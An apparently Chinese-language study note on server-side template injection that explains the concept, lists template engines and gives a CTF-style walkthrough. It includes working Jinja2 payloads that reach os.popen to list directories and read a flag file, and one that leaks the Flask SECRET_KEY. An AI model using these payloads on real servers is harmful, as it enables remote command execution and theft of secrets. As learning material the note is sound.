Server-sidetemplateinjection模板注⼊问题总结
概念:
服务器模板注⼊(Server-side template injection)攻击者能够使⽤本地的模板语法去注⼊⼀个恶意的payload,然后在服务器端执⾏该攻击,当与欧股直接输⼊数据到模板不做任何过滤的时候,可服务器端模板注⼊攻击。使得攻击者注⼊任何模板指令来控制服务器模板引擎,从⽽控制整个服务器。 SSTI是发⽣在服务器端的。模板引擎可以让⽹站实现界⾯和数据的分离,业务代码和逻辑代码的分离,
模板引擎会存在沙箱机制,但是沙箱逃逸技术可以绕过,
通俗点讲:拿到数据,塞到模板⾥⾯,然后渲染引擎将塞进去的东西⽣成HTML的⽂本,返回给浏览器,这样做的好处展⽰数据快,⼤⼤提升效率。
常见的模板渲染引擎:
Jade YAML前端页面模板
python使⽤的框架 jinja2 mako tornado django
php使⽤的框架 smarty twig ,
java使⽤的框架 java velocity
模板的前端渲染和后端渲染:
后端渲染是将⼀些模板规范语⾔翻译成 HTML CSS JAVASCript传给前端;前端渲染是将整个⽣成逻辑代码全部回传前端,再由客户端⽣成界⾯。
浏览器会直接接收到经过服务器计算之后的呈现给⽤户的最终的HTML字符串,计算就是服务器后端经过解析服务器端的模板来完成的,后端渲染的好处是对前端浏览器的压⼒较⼩,主要任务在服务器端就已经完成。
⾸先查看存在的⽂件 LS:
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
其次:⼀次排查⽂件中的内容
flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}
直接执⾏flag⽂件
flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
bugku上⾯的题⽬:
url/?flag={{config.SECRET_KEY}}
使⽤⼯具注⼊: TPLmap  tplmap使⽤的python2

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。